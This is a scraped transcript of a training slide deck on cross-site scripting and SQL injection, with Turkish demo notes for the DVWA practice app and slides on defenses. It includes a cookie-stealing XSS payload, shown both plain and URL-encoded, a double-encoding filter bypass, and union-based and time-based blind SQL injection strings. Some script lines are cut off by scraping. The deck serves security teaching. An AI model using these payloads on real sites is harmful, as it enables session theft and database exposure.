Presentation is loading. Please wait.

Presentation is loading. Please wait.

Cross Site Scripting & SQL injection

Similar presentations

Presentation on theme: "Cross Site Scripting & SQL injection"— Presentation transcript:

1 Cross Site Scripting & SQL injection
Hakan Tolgay

2 Input/Output handling - SOP
SOP – Same Origin Policy SOP, is a security measure used in Web browser programming languages such as JavaScript and Ajax to protect the confidentiality and integrity of information. Same Origin Policy prevents a web site's scripts from accessing and interacting with scripts used on other sites. To do that Protocol Domain name Port

3 Input/Output handling - SOP

4 Input/Output handling – Whats the problem
The typical problem in web applications is mixing of data and the malicious code. Input fields of a web application can be exploited by hackers unless required checks are made. Input fields should not be seen as simple text boxes.

5 What is Javascript JavaScript is a programming language used to make web pages interactive. It runs on your visitor's computer and doesn't require constant downloads from website. JavaScript is often used to create polls and quizzes.


7 Cross Site Scripting (XSS) – Introduction
XSS is a vulnerability that allows an attacker to run arbitrary JavaScript in the context of the vulnerable website. Exploit in Javascript Is not depended on a specific platform or language

8 XSS – Introduction The target of XSS attack is other users.
In the 3rd place of OWASP top 10 security risk list (OWASP top is available in the training materials) Thus, basically Cross Site Scripting is when attackers use vulnerabilities in your web application to distribute malicious scripts to other users (which then run other users web browsers)

9 Types of XSS Reflected XSS Stored XSS DOM Based XSS
Link in other website or Stored XSS Forum, bulletin board, feedback form DOM Based XSS PDF Adobe Reader , FLASH player

10 Reflected XSS

11 Reflected XSS Say that the welcome page is vulnerable to a XSSS attack since a welcome message can be displayed on the welcome page with the user's name passed as a parameter: Pass the following Javascript code as the name parameter, in order to redirect the user to a page atacker controls <SCRIPT> document.location=' </SCRIPT> The above code retrieves the user's cookies and sends them as parameters to a CGI script. The following code passed as a parameter would be too visible: =' bin/script.cgi?'+document.cookie</SCRIPT> However, coding the URL makes it possible to disguise the attack: 6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%5c%27%68%74%74%70%3a%2f%2f%73%69%74% 65%2e%70%69%72%61%74%65%2f%63%67%69%2d%62%69%6e%2f%73%63%72%69%70%74%2e% 63%67%69%3f%5c%27%20%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f% 53%43%52%49%50%54%3e

12 Reflected XSS

13 Reflected XSS – DEMO ===REFLECTED XSS DEMO===
DVWA uygulamasının (Username:admin, Password:admin) 'XSS Reflected' bölümünde demo gerçekleştirilir. Input alanına <abc> gibi bir değer girilir. * Yansıtılan mesajda görülmemesi üzerine sayfanın kaynak koduna bakılır, burada değerin var olduğu görülür; * <abc>nin HTML tag olarak yorumlandığı anlaşılır. * <script>alert(document.cookie)</script> ile cookie'nin görüntülenmesi sağlanır.

14 Stored XSS JavaScript supplied by the attacker is stored by the website (e.g. in a database) Doesn’t require the victim to supply the JavaScript somehow, just visit the exploited web page More dangerous than Reflected XSS

15 Stored XSS – DEMO ===STORED XSS DEMO===
DVWA uygulamasının 'XSS stored' bölümünde demo gerçekleştirilir. Mesaj alanına <abc> girerek mesaj bölümünde görüntülenmediği ama sayfanın kodunda var olduğu görülür. Mesaj alanına <script>alert('XSS')</script> girilerek sayfanın her ziyaretinde bu mesajın alındığı görülür.

16 XSS – What can you do with JavaScript
Pop-up alerts and prompts Access cookies/session tokens Detect installed programs Detect browser history Capture keystrokes (and other trojan functionality) Port scan the local network Redirect to a different web site Determine if they are logged on to a particular site Capture clipboard content Detect if the browser is being run in a virtual machine Rewrite the status bar Exploit browser vulnerabilities Launch executable files (in some cases)

17 XSS - Defense What can be done?

18 Defense - Blacklisting approach
Blacklist has items which shouldn’t have Is fast to set up, but can be bypassed more easily by a skilled attacker. Do not use "blacklist" validation to detect XSS in input or to encode output. Searching for and replacing just a few characters ("<" ">" and other similar characters or phrases such as “script”) is weak and has been attacked successfully. Even an unchecked “<b>” tag is unsafe in some contexts. XSS has a surprising number of variants that make it easy to bypass blacklist validation.

19 Defense - Whitelisting approach
Whitelist has items which should have Whitelisting allows for a much stronger security solution than blacklisting but comes with a steep learning curve. Once mastered, though, whitelisting is very effective at stopping XSS attacks.

20 Defense - Encoding/Decoding
Encoding variable output substitutes HTML markup with alternate representations called entities By using double encoding it’s possible to bypass security filters that only decode user input once.

21 Encoding Demo <script>alert("XSS var")</script>

22 Defense - Encoding/Decoding - Example
<script>alert('XSS')</script> Web application can have a character filter which prohibits characters such as “< “, “>” and “/”, since they are used to perform web application attacks. The attacker could use a double encoding technique to bypass the filter and exploit the client’s session. The encoding process for this Java script is: Finally, the malicious double encoding code is: %253Cscript%253Ealert('XSS')%253C%252Fscript%253E

23 Defense Never Insert Untrusted Data Except in Allowed Locations in OWASP XSS prevention list rules Check

24 What is SQL Structured Query Language
A Language designed for managing data held in databases Examples: SELECT * FROM usersTable WHERE uname = ‘hakan’ SELECT isbn, title, price FROM Book WHERE price > ORDER BY title;

25 What is SQL – more example
SELECT Name, Surnamme FROM Custome WHERE Age > 30; Customer Name Surname Age Sex Lisa Becker 37 F Erwin Visser 31 M Lara Martini 24 Alan Newman 29 Result Set

26 SQL Injection Sending parameters directly from application to the database server can cause unauthorized queries. #1 at top 10 security risk list

27 SQL Injection statement = "SELECT * FROM users WHERE name ='" + userName + "'; ' or '1'='1 SELECT * FROM users WHERE name = '' OR '1'='1';

28 SQL Injection – DEMO ===SQLi DEMO===
DVWA uygulamasının 'SQL Injection' bölümünde demo yapılır. Security Level'ın LOW olduğundan emin olunmalı. User ID alanına 1' göndererek alınan hata gözlenir. * 1' or 1=1 -- (iki tireden sonra bir boşluk var!) göndererek tüm kayıtların listelenmesi sağlanır. * 1' union select '', '' -- göndererek sorgunun select kısmındaki kolon sayısı tespit edilir (Bu demoda 2 kolon). * 2' union select version(), database() -- göndererek veritabanı ile ilgili bilgiler elde edilir.


30 SQL Injection – Blind injection
=== SQLi BLIND DEMOSU === DVWA uygulaması "SQL Injection (Blind)" bölümünde demo gerçekleştirilir. "1'" gönderilerek bir sonuç dönmediği gözlenir; 1000 göndererek olmayan bir ID için yine bir sonuç dönmediği gözlenir. - Yani, tek tırnak işaretini yorumladı mı, sanitize mi etti, yanıta bakarak anlayamıyoruz. * "2' order by 1 #" gönderilerek sonuç döndüğü görülür. - Sonuç dönmesi, 2'den sonrasını ignore ettiği anlamına da gelebilir. Bunun sağlamasını yapmak lazım: - "2' order by 3 #" gönderilerek sonuç dönmediği görülür. + Hem blindSQLi olduğunu anladık, hem kolon sayısının 2 olduğunu anladık. * "2' union sleep(5), null #" gönderilerek sonucun 5 saniye sonra döndüğü gözlemlenir => Time-based blind SQLi.

31 SQL Injection – Defense
Use parameterized queries For Java use PreparedStatement For c# use Parameters.Add Check OWASP SQL injection cheat sheet

32 Thank You

Download ppt "Cross Site Scripting & SQL injection"

Similar presentations

Ads by Google